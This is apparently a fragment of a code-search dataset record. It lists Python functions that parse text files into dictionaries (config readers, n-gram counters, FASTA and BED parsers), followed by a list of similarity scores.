BalanceCurlies(code)\n nl, nr = CountCurlies(code)\n assert nl==nr, \"Number of left and right curly braces not equal:\"+code\n envkey = q2.group(1)\n codelist = code.split('\\n')\n return envkey, codelist", "def separate(self, lines):\n\n seps = []\n curr = \"\"\n left = 0\n right = 0\n\n for line in lines.split(\"\\n\"):\n if not line:\n continue\n l = line.count(\"{\")\n r = line.count(\"}\")\n left += l\n right += r\n curr += line + \"\\n\"\n\n if left == right:\n left = 0\n right = 0\n if curr:\n seps.append(curr)\n curr = \"\"\n return seps", "def builddict(fname,ignorestrings=['#'],dictdelim='='):\n\tf = open(fname, \"r\")\n\tline = f.readline()\n\ti = 0\n\t\n\tparamdict={}\n\twhile line != '':\n\t\ttmp = line.strip()\n\t\tif tmp :\n\t\t\tfor st in ignorestrings:\n\t\t\t\ttmp = tmp.split(st)[0]\n\t\t\t\tif len(tmp) >1:\n\t\t\t\t\ttp = tmp.split(dictdelim)\n\t\t\t\t\tkey = tp[0].strip()\n\t\t\t\t\tval = tp[1].strip()\n\t\t\t\t\tparamdict[str(key)] = str(val) \n\t\tline=f.readline()\n\t\n\tf.close()\n\treturn paramdict", "def read(self):\n dictionary = {}\n with open(self.path) as file:\n key_header = \"\"\n for line in file:\n entry = line.strip().split()\n if len(entry) == 0:\n continue\n if len(entry) == 1:\n key_header = entry[0]+\"_\"\n else:\n key = entry[0].strip()\n value = reduce(lambda x1, y1: x1+\" \" + y1, entry[1:])\n dictionary[key_header+key] = value\n return dictionary", "def file_to_dict(file_handle):\n file_contents = file_handle.readlines()\n LOGGER.debug('file contents \\n%s', file_contents)\n output_records = []\n header = None\n last_record_type = 'S' # start new set\n\n for file_contents_line in file_contents:\n\n record_type = file_contents_line[:1]\n LOGGER.debug('record_type=%s', record_type)\n\n if 
record_type == '0' and last_record_type in ('S', '7'):\n\n # validate/get the header record fields\n header = re.match(REGEX_DE_HEADER, file_contents_line)\n if not header:\n raise Exception('Invalid record format - de header')\n\n elif record_type in ('1', '2', '3') and last_record_type in ('0', '1', '2', '3'):\n\n # validate/get the detail record fields\n detail = re.match(REGEX_DE_DETAIL, file_contents_line)\n if not detail:\n raise Exception('Invalid record format - de detail')\n\n # build transaction record\n LOGGER.debug(\"Creating OUTPUT DICT Direct entry\\n%s\\n%s\", header.groupdict(), detail.groupdict())\n output_record = {'version': 1}\n output_record.update(header.groupdict())\n output_record.update(detail.groupdict())\n LOGGER.debug(\"%s\", output_record)\n\n # add message to output list\n output_records.append(output_record)\n\n elif record_type == '7' and last_record_type in ('1', '2', '3'):\n pass\n else:\n raise Exception(\n 'Invalid record type - record_type=[{}], last_record_type=[{}]'.format(record_type, last_record_type)\n )\n\n last_record_type = record_type\n\n return output_records", "def build_basenames():\r\n dict = {}\r\n with open(STREETS_FILE) as file:\r\n for line in file:\r\n dict[line.strip()] = True\r\n return dict", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def file_read(filename):\n fin=open(filename)\n count=0\n d=dict()\n for line in fin:\n line=line.replace(\"-\",\" \")\n word=line.split()\n for item in word:\n item=item.strip(string.punctuation + string.whitespace)\n item=item.lower()\n d[item]=d.get(item,0)+1\n count=count+1\n return count,d", "def generate_bed_dict(line, bed_header):\n out_dict = dict((key, value) for key, value in izip(bed_header, line))\n return(out_dict)", "def env_lines_to_dict(self, env_lines):\n env_dict = {}\n for env_line in env_lines:\n split_env_line = shlex.split(env_line)\n if split_env_line[0] == \"export\":\n split_env_line = split_env_line[1:]\n for item in split_env_line:\n if \"=\" in item:\n k, v = item.split(\"=\", 1)\n env_dict[k] = v\n return env_dict", "def format_lines(unprocessed_text: str) -> List[List[str]]:\n stored_lines: List[List[str]] = []\n new_line: List = []\n new_word: str = \"\"\n for char in unprocessed_text:\n if char != \"\\n\":\n if char != \" \" and char.isalpha():\n new_word += char\n else:\n new_line.append(new_word)\n new_word = \"\"\n else:\n stored_lines.append(new_line)\n new_line = []\n return stored_lines", "def collect_response(response_lines):\n response_dict = {}\n for entry in filter(None, response_lines):\n prefix = entry[0]\n if prefix in response_dict:\n response_dict[prefix] += [entry]\n else:\n response_dict[prefix] = [entry]\n return response_dict", "def parse_fasta(dataset):\n\n records = {}\n record_id = 
None\n\n for line in [lines.strip() for lines in dataset.splitlines()]:\n \n if line.startswith('>'):\n records_id = line[1:]\n records[records_id] = \"\"\n else:\n records[records_id] += line\n #print records\n \n return records" ]
[ "0.6359959", "0.6270492", "0.6224244", "0.6006112", "0.599421", "0.5908032", "0.5810006", "0.579494", "0.57904506", "0.57837945", "0.5747093", "0.57200885", "0.56876975", "0.56852555", "0.5679893", "0.56574166", "0.56393373", "0.5639167", "0.55973274", "0.55856735", "0.5568694", "0.5562582", "0.55551136", "0.5553522", "0.5536525", "0.5527266", "0.552586", "0.5481176", "0.54792583", "0.54542804", "0.5443447", "0.5429592", "0.54041016", "0.53951585", "0.53911376", "0.53753453", "0.53648424", "0.5360278", "0.53548634", "0.5348094", "0.53365827", "0.53323865", "0.5331229", "0.53225505", "0.53222024", "0.53206074", "0.53154266", "0.53150535", "0.5307249", "0.5278402", "0.5277631", "0.52621776", "0.526055", "0.5236088", "0.5227831", "0.52227247", "0.5215159", "0.52050596", "0.5204071", "0.52030087", "0.5201938", "0.5185602", "0.51828986", "0.5179346", "0.51749986", "0.51736045", "0.516977", "0.5168777", "0.5168265", "0.51681423", "0.5158197", "0.51574695", "0.5154557", "0.51516366", "0.5141003", "0.5136903", "0.51349777", "0.5129529", "0.5126662", "0.51247716", "0.51165426", "0.5113415", "0.5109879", "0.5101959", "0.51017284", "0.5100287", "0.50869447", "0.5080343", "0.5076973", "0.5068243", "0.50597936", "0.5058097", "0.5055428", "0.50545704", "0.50543797", "0.50531805", "0.5051531", "0.50491136", "0.5045974", "0.5044756", "0.50429034" ]
0.0
-1
Entry point for the interpreter process.
def interpret(data: list) -> dict: return Interpreter.structure(data)
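For context, a minimal runnable sketch of what this entry point implies. The `Interpreter` class below is a hypothetical stand-in: the source shows only the one-line entry point, so the static `structure` method and its fold-pairs-into-a-dict behavior are assumptions, not the repo's actual API.

from typing import Any, Dict, List

class Interpreter:
    # Hypothetical stand-in; the source does not define this class.
    @staticmethod
    def structure(data: List[Any]) -> Dict[str, Any]:
        # Assume each item is a (key, value) pair produced by an earlier
        # parsing stage, and fold the pairs into a dictionary.
        return {key: value for key, value in data}

def interpret(data: list) -> dict:
    return Interpreter.structure(data)

print(interpret([("host", "localhost"), ("port", 8080)]))
# -> {'host': 'localhost', 'port': 8080}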
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run():\n main()", "def main():\n run_program()", "def main():\n pass", "def main():\n return", "def main() -> None:\n return", "def main() -> None:", "def main() -> None:", "def main() -> None:", "def main() -> None:", "def main():\n args = parse_args()\n process_args(args)", "def main(self) -> None:\n pass", "def main():\n\tpass", "def main():\n print(\"is Running!\")", "def console_entry():\n #main()", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def run_main():\n main(sys.argv)", "def main():\n\n BASIC.run(PROGRAM)", "def main(self):\r\n pass", "def main():\n Main()", "def main():\n ...", "def main():\n\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n CLI_APP.run()", "def main():\n sys.exit(RBExt().run(sys.argv[1:]))", "def entrypoint(cls):\n try:\n cls().run(sys.argv[1:])\n except KeyboardInterrupt:\n pass", "def main():\n print(\"Call your main application code here\")", "def main():\n print(\"Call your main application code here\")", "def main():\n print(\"Call your main application code here\")", "def run():\n\n call_args = sys.argv[1:]\n main(call_args)", "def main():\n\n try:\n args.handler()\n except pymoira.BaseError as err:\n error( err )", "def main():\n pass", "def main():\n print(\"def main\")\n return APP.run()", "def main():\n greetings()\n run_jarvis()", "def main(args=None):\n app()\n return 0", "def main(args):", "def main(args):", "def main(args=None):", "def main(args=None):", "def main():\n print_title()\n run_terminal()", "def run():\n # main(sys.argv[1:])\n main()", "def main():\n\tcli = Cli()\n\tcli.run()", "def _main():\n try:\n parser, options, arguments = _parse_options()\n env.update(vars(options))\n\n arguments = parser.largs\n\n if not (arguments):\n parser.print_help()\n sys.exit(0)\n\n commands_to_run = _parse_arguments(arguments)\n\n for name, args, kwargs in commands_to_run:\n try:\n func = globals()[name]\n except KeyError:\n sys.stderr.write('Command %s does not exist' % name)\n sys.exit(1)\n\n func(*args, **kwargs)\n except SystemExit:\n raise\n except KeyboardInterrupt:\n sys.stdout.write('\\nQuit\\n')\n\n sys.exit(0)", "def main():\n\n pass\n\n return None", "def main():\n\n pass\n\n return None", "def main():\n get_engine(onnx_file_path, engine_file_path)", "def main(self):\n cmd = \"self.%s(sys.stdin)\" % sys.argv[1]\n exec(cmd)", "def entry_point():", "def entry_point():", "def entry_point():" ]
[ "0.7234675", "0.7215261", "0.7081077", "0.7078648", "0.7007489", "0.6970343", "0.6970343", "0.6970343", "0.6970343", "0.6953635", "0.69507045", "0.6907722", "0.683263", "0.6791568", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676187", "0.67504084", "0.67454857", "0.673418", "0.67244214", "0.6724404", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.67053825", "0.66925776", "0.6672022", "0.66596675", "0.66596675", "0.66596675", "0.65951234", "0.6592376", "0.6588621", "0.6567874", "0.65454483", "0.65417564", "0.6540287", "0.6540287", "0.6518041", "0.6518041", "0.6515949", "0.6499827", "0.6491814", "0.6484809", "0.64633155", "0.64633155", "0.6447633", "0.6433612", "0.64245886", "0.64245886", "0.64245886" ]
0.0
-1
Checks a file's permissions against a permission requirement
def _does_perms_meet_req(stats, disallowed_perms):
    # There's undoubtedly some simple clever binary algebra way to do this
    vals_with = dict()
    vals_with['r'] = [4, 5, 6, 7]
    vals_with['w'] = [2, 3, 6, 7]
    vals_with['x'] = [1, 3, 5, 7]

    # Scopes are User, Group, and World
    scope = ['U', 'G', 'W']

    sections = disallowed_perms.split(',')

    # Sections are the three sections in the disallowed string we are passed,
    # which represent user, group, and world.

    # If we didn't get 3 sections, it's malformed - pass the test with a note
    if len(sections) != 3:
        return_result = TestResult(Result.SKIP, notes="Malformed permission req")
    else:
        did_pass = True
        reason = ""

        # Get numeric value for the file permissions - e.g. 644
        file_perms_num = oct(stats.st_mode & 0o777)[-3:]

        cur_pos = 0
        for section in sections:
            cur_perm = file_perms_num[cur_pos]

            # If we're checking for read access and the numeric permission
            # indicates that read access is granted, it's failed... add why
            # to the notes
            if 'r' in section and int(cur_perm) in vals_with['r']:
                did_pass = False
                reason += scope[cur_pos] + ':r '

            # Same for write access...
            if 'w' in section and int(cur_perm) in vals_with['w']:
                did_pass = False
                reason += scope[cur_pos] + ':w '

            # and execute access
            if 'x' in section and int(cur_perm) in vals_with['x']:
                did_pass = False
                reason += scope[cur_pos] + ':x '

            # Next time through the loop look at the next section
            cur_pos += 1

        if did_pass:
            return_result = TestResult(Result.PASS)
        else:
            return_result = TestResult(Result.FAIL, notes=reason)

    return return_result
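A minimal usage sketch for the permission check above. `Result` and `TestResult` are referenced but not defined in the snippet, so the stubs here are assumptions; `_does_perms_meet_req` itself would be defined after them.

import os
import tempfile
from dataclasses import dataclass
from enum import Enum

class Result(Enum):      # hypothetical stub for the snippet's Result type
    PASS = "PASS"
    FAIL = "FAIL"
    SKIP = "SKIP"

@dataclass
class TestResult:        # hypothetical stub for the snippet's TestResult type
    result: Result
    notes: str = ""

# (paste _does_perms_meet_req from above here, after the stubs)

# Disallow group write and world write/execute: the three comma-separated
# sections map to user, group, world.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    path = tmp.name
os.chmod(path, 0o644)
print(_does_perms_meet_req(os.stat(path), ",w,wx").result)   # Result.PASS

os.chmod(path, 0o666)    # group and world are now writable
res = _does_perms_meet_req(os.stat(path), ",w,wx")
print(res.result, res.notes)                                 # Result.FAIL G:w W:w
os.remove(path)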
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_permissions(self):\n self.assertEqual(dir_perm, 0o2750)\n self.assertEqual(file_perm, 0o0440)", "def check_files_permissions(self):\n result = []\n interesting_files = [\n # directories\n '/etc/init.d'\n '/etc/cron.d',\n '/etc/cron.daily',\n '/etc/cron.hourly',\n '/etc/cron.monthly',\n '/etc/cron.weekly',\n\n # files\n '/etc/sudoers',\n '/etc/exports',\n '/etc/at.allow',\n '/etc/at.deny',\n '/etc/crontab',\n '/etc/cron.allow',\n '/etc/cron.deny',\n '/etc/anacrontab',\n '/var/spool/cron/crontabs/root',\n ]\n\n for path in interesting_files:\n if os.path.isdir(path):\n for root, dirs, files in os.walk(path):\n for file in files:\n fullpath = os.path.join(root, file)\n fm = FileManager(fullpath, check_inside=True)\n result.append(fm)\n else:\n fm = FileManager(path, check_inside=True)\n result.append(fm)\n\n return 'files_permissions', result", "def file_perms( fname, permissions, remote=None ):\n if remote == None:\n if perms.i_own( fname ):\n if type(permissions) == type(''):\n perms.apply_chmod( fname, permissions )\n else:\n # assume 'permissions' is a tuple or list\n perms.apply_chmod( fname, *permissions )\n else:\n if remote.x_i_own( fname ):\n if type(permissions) == type(''):\n remote.x_apply_chmod( fname, permissions )\n else:\n # assume 'permissions' is a tuple or list\n remote.x_apply_chmod( fname, *permissions )", "def permissions_check(\n basedir='.',\n verbose_level=0,\n):\n # File permissions on Cygwin/Windows filesystems don't work the\n # same way as Linux. Don't try to change them.\n # TODO(dittrich): Is there a Better way to handle perms on Windows?\n fs_type = get_fs_type(basedir)\n if fs_type in ['NTFS', 'FAT', 'FAT32']:\n msg = (\n f\"[-] {basedir} has file system type '{fs_type}': \"\n \"skipping permissions check\"\n )\n logger.info(msg)\n return\n any_other_perms = stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH\n for root, dirs, files in os.walk(basedir, topdown=True):\n for name in files:\n path = os.path.join(root, name)\n try:\n st = os.stat(path)\n perms = st.st_mode & 0o777\n open_perms = (perms & any_other_perms) != 0\n if (open_perms and verbose_level >= 1):\n print(\n f\"[!] file '{path}' is mode {oct(perms)}\",\n file=sys.stderr\n )\n except OSError:\n pass\n for name in dirs:\n path = os.path.join(root, name)\n try:\n st = os.stat(path)\n perms = st.st_mode & 0o777\n open_perms = (perms & any_other_perms) != 0\n if (open_perms and verbose_level >= 1):\n print(\n (\n f\"[!] 
directory '{path}' is mode \"\n f\"{oct(perms)}\"\n ),\n file=sys.stderr\n )\n except OSError:\n pass", "def can(self, permissions: Union[str, List]) -> bool:", "def _have_permissions(self, location):\n if not os.path.isfile(location):\n return True\n \n stats = os.stat(location)\n # check specifically for write permission\n return bool(stats.st_mode & stat.S_IWUSR)", "def check_perms(resource):\r\n stmode = os.stat(resource).st_mode\r\n return (getattr(stat, 'S_IROTH') & stmode) > 0", "def check_perms(resource):\r\n stmode = os.stat(resource).st_mode\r\n return (getattr(stat, 'S_IROTH') & stmode) > 0", "def check_permission(perm_mode, flags=stat.S_IWOTH):\n return bool(perm_mode & flags)", "def _check_permissions(source: Any, info: Info, kwargs: Dict[str, Any]):\n for permission_class in self.permission_classes:\n permission = permission_class()\n\n if not permission.has_permission(source, info, **kwargs):\n message = getattr(permission, \"message\", None)\n raise PermissionError(message)", "def _checkPermission(self, module):\r\n permission = []\r\n\r\n for p in sys.path:\r\n path = os.path.join(p, module[0])\r\n\r\n if os.path.isdir(path):\r\n if not os.access(path, os.R_OK | os.X_OK):\r\n permission.append(True)\r\n elif (len(module) > 1 and\r\n any(os.access(os.path.join(path, init), os.F_OK)\r\n for init in ['__init__.py', '__init__.pyc'])):\r\n permission.append(self._checkPermission(module[1:]))\r\n\r\n return bool(permission and all(permission))", "def permissions():\n pass", "def are_readable_files(self, fnames):\n for fname in fnames:\n if not os.access(fname, os.R_OK):\n self.cli_parser.error(\"%s doesn't exist or you do \"\n \"not have read permissions to it.\" % fname)", "def has_permission(self, file):\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@link android.Manifest.permission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@RequiresPermission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@link Manifest.permission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@RequiresPermission.Read(@RequiresPermission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\"@RequiresPermission.Write(@RequiresPermission\"):\n return True\n\n if self.string_file_analyzer.get_keyword_matching_lines(\n file,\n kw=\".permission\"):\n return True\n\n return False", "def cant(self, permissions: Union[str, List]) -> bool:", "def test_specifiedPermissions(self):\n log1 = logfile.LogFile(self.name, self.dir, defaultMode=0066)\n mode = stat.S_IMODE(os.stat(self.path)[stat.ST_MODE])\n if runtime.platform.isWindows():\n # The only thing we can get here is global read-only\n self.assertEquals(mode, 0444)\n else:\n self.assertEquals(mode, 0066)", "def can_any(self, permissions: Union[str, List]) -> bool:", "def check_permissions(permission, payload):\n if 'permissions' not in payload:\n abort(401)\n\n if permission not in payload['permissions']:\n abort(401)\n\n return True", "def PermissionsFileProcessor(input_file):\n access_value_msg = GetApiMessage('Dataset').AccessValueListEntry\n try:\n permissions_array = []\n permissions_from_file = yaml.load(input_file[0])\n permissions_from_file = permissions_from_file.get('access', None)\n if not permissions_from_file or not isinstance(permissions_from_file, list):\n raise PermissionsFileError(\n 'Error parsing permissions file: no access list defined 
in file')\n for access_yaml in permissions_from_file:\n permission = encoding.PyValueToMessage(access_value_msg, access_yaml)\n if _ValidatePermission(permission):\n permissions_array.append(permission)\n else:\n raise PermissionsFileError(('Error parsing permissions file:'\n ' invalid permission definition'\n ' [{}]'.format(permission)))\n\n return sorted(permissions_array, key=lambda x: x.role)\n except yaml.YAMLParseError as ype:\n raise PermissionsFileError('Error parsing permissions file [{}]'.format(\n ype))", "def get_permissions(self, filepath):\n return oct(os.stat(filepath).st_mode & 0777)", "def test_permissions(self):\n exist = os.access('models/amenity.py', os.F_OK)\n self.assertTrue(exist)\n read = os.access('models/amenity.py', os.R_OK)\n self.assertTrue(read)\n write = os.access('models/amenity.py', os.W_OK)\n self.assertTrue(write)\n exe = os.access('models/amenity.py', os.X_OK)\n self.assertTrue(exe)", "def check_permissions(self, request):\n for permission in self.get_permissions():\n if not permission.has_permission(request, self):\n self.permission_denied(\n request,\n message=getattr(permission, 'message', None),\n code=getattr(permission, 'code', None)\n )", "def test_specifiedPermissions(self):\n log1 = logfile.LogFile(self.name, self.dir, defaultMode=0o066)\n self.addCleanup(log1.close)\n mode = stat.S_IMODE(os.stat(self.path)[stat.ST_MODE])\n if runtime.platform.isWindows():\n # The only thing we can get here is global read-only\n self.assertEqual(mode, 0o444)\n else:\n self.assertEqual(mode, 0o066)", "def set_permissions(self, permissions):\n\n\t\tif Platform.PLATFORM_POSIX == self.__platform.get_platform():\n\t\t\tif permissions.__class__ == str and re.match('([-r][-w][-xsStT]){3,3}', permissions):\n\t\t\t\tself.__permissions = 0\n\t\t\t\tif permissions[0] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IRUSR\n\t\t\t\tif permissions[1] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IWUSR\n\t\t\t\tif permissions[2] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IXUSR\n\t\t\t\tif permissions[3] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IRGRP\n\t\t\t\tif permissions[4] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IWGRP\n\t\t\t\tif permissions[5] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IXGRP\n\t\t\t\tif permissions[6] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IROTH\n\t\t\t\tif permissions[7] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IWOTH\n\t\t\t\tif permissions[8] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IXOTH\n\t\t\t\t\t\n\t\t\telif permissions.__class__ == str and re.match('(0)?[0-7]{3,3}', permissions):\n\t\t\t\tif len(permissions) == 3:\n\t\t\t\t\tpermissions = '0' + permissions\n\t\t\t\tself.__permissions = octstr_to_int(permissions)\n\t\t\t\n\t\t\telif permissions.__class__ == int and 0 <= permissions <= 511:\n\t\t\t\tself.__permissions = permissions\n\t\t\t\n\t\t\telse:\n\t\t\t\traise PermissionsInvalidError()\n\n\t\telif Platform.PLATFORM_WINDOWS == self.__platform.get_platform():\n\t\t\tif permissions.__class__ == str and re.match('[-r][-w]', permissions):\n\t\t\t\tself.__permissions = 0\n\t\t\t\tif permissions[0] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IREAD\n\t\t\t\tif permissions[1] != '-':\n\t\t\t\t\tself.__permissions |= FileObject.S_IWRITE\n\t\t\telif permissions.__class__ == int and 0 <= permissions <= 511:\n\t\t\t\tself.__permissions = permissions\n\t\t\telse:\n\t\t\t\traise PermissionsInvalidError() \n\t\telse:\n\t\t\traise 
PlatformNotSupportedError()", "def test_check_perm(self):\n #Test something that really shouldn't be there\n with pytest.raises(DbException) as err:\n ModulePerm.get_module_perm_by_id(0)\n assert str(err.value) == \"(404, 'Permission not found.')\"\n\n perm = ModulePerm.get_module_perm_by_id(self.permList[0].id)\n assert perm.id == self.permList[0].id\n assert perm.user_id == self.permList[0].user_id\n assert perm.module_id == self.permList[0].module_id\n assert perm.permissions == self.permList[0].permissions\n assert perm.permissions == 15\n\n assert perm.check_perm_read_raw()\n assert perm.check_perm_write_raw()\n assert perm.check_perm_share_raw()\n assert perm.check_perm_own_raw()\n\n perm = ModulePerm.get_module_perm_by_id(self.permList[2].id)\n assert perm.id == self.permList[2].id\n assert perm.user_id == self.permList[2].user_id\n assert perm.module_id == self.permList[2].module_id\n assert perm.permissions == self.permList[2].permissions\n assert perm.permissions == 0\n\n assert not perm.check_perm_read_raw()\n assert not perm.check_perm_write_raw()\n assert not perm.check_perm_share_raw()\n assert not perm.check_perm_own_raw()", "def set_file_permissions(host, fqpath, perms):\n command = \"chmod %s %s\" % (perms, fqpath)\n rcode, _, rerr = g.run(host, command)\n\n if rcode == 0:\n return True\n\n g.log.error('chmod failed: %s' % rerr)\n return False", "def sort_permissions(fl):\n\n if oct(os.stat(fl).st_mode)[4:] != '666':\n os.chmod(fl, 0o666)", "def check_writable ( self,\n fspath, mkdir_chown=False, mkdir_chmod=False, mkdir_p=True\n ):\n success = False\n\n ERRNOS_IGNORE = { errno.EACCES, }\n\n try:\n if self.do_touch ( fspath ):\n success = True\n\n except IOError as ioerr:\n if ioerr.errno == errno.EPERM:\n pass\n elif ioerr.errno == errno.ENOENT:\n try:\n if self.dodir (\n os.path.dirname ( fspath ),\n chown=mkdir_chown, chmod=mkdir_chmod, mkdir_p=mkdir_p\n ) and self.do_touch ( fspath ):\n success = True\n\n except ( OSError, IOError ) as err:\n if err.errno == errno.EPERM:\n pass\n elif err.errno in ERRNOS_IGNORE:\n self.error (\n 'Got {name} with unexpected '\n 'errno={code:d} ({code_name})\\n'.format (\n name = err.__class__.__name__,\n code = err.errno,\n code_name = errno.errorcode [err.errno],\n )\n )\n else:\n raise\n # -- end <try again>\n elif ioerr.errno in ERRNOS_IGNORE:\n self.error (\n 'Got {name} with unexpected '\n 'errno={code:d} ({code_name})\\n'.format (\n name = ioerr.__class__.__name__,\n code = ioerr.errno,\n code_name = errno.errorcode [ioerr.errno],\n )\n )\n else:\n raise\n return success", "def test_provider_system_hook_file_chmod(change_dir, fix_file_perms):\n tackle(context_file='chmod.yaml', no_input=True)\n assert oct(os.stat('tackle.yaml').st_mode)[-3:] == \"600\"", "def check_file_validity(self, file_):\n if not os.access(file_, os.F_OK):\n raise TailError(\"File '%s' does not exist\" % (file_))\n if not os.access(file_, os.R_OK):\n raise TailError(\"File '%s' not readable\" % (file_))\n if os.path.isdir(file_):\n raise TailError(\"File '%s' is a directory\" % (file_))", "def can_manage(self, filename):\n return False", "async def permission_valid_check(cls):\n pass", "def check_arguments(self):\n self.check_num_arguments()\n self.are_readable_files(self.args)", "def check_authorization(\n self,\n perms: Sequence[tuple[str, str]] | None = None,\n dag_id: str | None = None,\n ) -> bool:\n if not perms:\n return True\n\n for perm in perms:\n if perm in (\n (permissions.ACTION_CAN_READ, permissions.RESOURCE_DAG),\n (permissions.ACTION_CAN_EDIT, 
permissions.RESOURCE_DAG),\n (permissions.ACTION_CAN_DELETE, permissions.RESOURCE_DAG),\n ):\n can_access_all_dags = self.has_access(*perm)\n if can_access_all_dags:\n continue\n\n action = perm[0]\n if self.can_access_some_dags(action, dag_id):\n continue\n return False\n\n elif not self.has_access(*perm):\n return False\n\n return True", "def RequestedPermissions(self) -> _n_6_t_0:", "def edit_file_permission(request, app=None, priv=None):\n pass", "def test_custom_permissions(self, course_dir):\n run_nbgrader([\"db\", \"assignment\", \"add\", \"ps1\"])\n run_nbgrader([\"db\", \"student\", \"add\", \"foo\"])\n self._empty_notebook(join(course_dir, \"source\", \"ps1\", \"foo.ipynb\"))\n run_nbgrader([\"generate_assignment\", \"ps1\"])\n\n self._empty_notebook(join(course_dir, \"submitted\", \"foo\", \"ps1\", \"foo.ipynb\"))\n run_nbgrader([\"autograde\", \"ps1\"])\n run_nbgrader([\"generate_feedback\", \"ps1\", \"--GenerateFeedback.permissions=444\"])\n\n assert isfile(join(course_dir, \"feedback\", \"foo\", \"ps1\", \"foo.html\"))\n assert self._get_permissions(join(course_dir, \"feedback\", \"foo\", \"ps1\", \"foo.html\")) == '444'", "def check_write_permission():\n if platform != \"android\":\n return True\n from android.permissions import Permission, check_permission\n permission = Permission.WRITE_EXTERNAL_STORAGE\n return check_permission(permission)", "def check_write_permission():\n if platform != \"android\":\n return True\n from android.permissions import Permission, check_permission\n permission = Permission.WRITE_EXTERNAL_STORAGE\n return check_permission(permission)", "def test_get_permissions(self):\n pass", "def perms_check(self, ctx):\r\n\t\tcommand = ctx.invoked_with\r\n\t\ttry:\r\n\t\t\tif config.cfg[\"main\"][\"perms\"][command] in [x.id for x in ctx.author.roles]:\r\n\t\t\t\treturn True\r\n\t\t\treturn False\r\n\t\texcept KeyError:\r\n\t\t\tif config.cfg[\"main\"][\"perms\"][\"global\"] in [x.id for x in ctx.author.roles]:\r\n\t\t\t\treturn True\r\n\t\t\treturn False", "def test_check():\n for f in cfg.required_files:\n assert os.path.isfile(f)", "def CheckPerm(self, mr, perm, art=None, granted_perms=None):\n return servlet_helpers.CheckPerm(\n mr, perm, art=art, granted_perms=granted_perms)", "async def perms(perms, g, c, m):\n for perm in perms:\n if not dict(g.me.guild_permissions).get(perm):\n await c.send(f'I must have the `{perm.upper()}` permission to do this.')\n raise Exception()\n if not dict(m.guild_permissions).get(perm):\n await c.send(f'You must have the `{perm.upper()}` permission to do this.')\n raise Exception()\n return True", "def check_permission():\n if IS_ADMIN:\n out_info(\"Running as Root/Admin\")\n else:\n out_warning(\"Running without root/admin privileges\")", "def check_requirements(self):\n if not os.path.isfile(self.file_path):\n _logger.error(\"File not found\")\n _logger.error(ex)\n raise\n _logger.info(\"File notifier check passed\")", "def check_permissions(permission, payload):\n if 'permissions' not in payload:\n raise AuthError({\n 'code': 'invalid_claims',\n 'description': 'Token must include permissions'\n }, 401)\n elif permission not in payload['permissions']:\n raise AuthError({\n 'code': 'permission_missing',\n 'description': 'Permission not found.'\n }, 403)\n else:\n return True", "def permission_required_or_403(perm, *args, **kwargs):\n 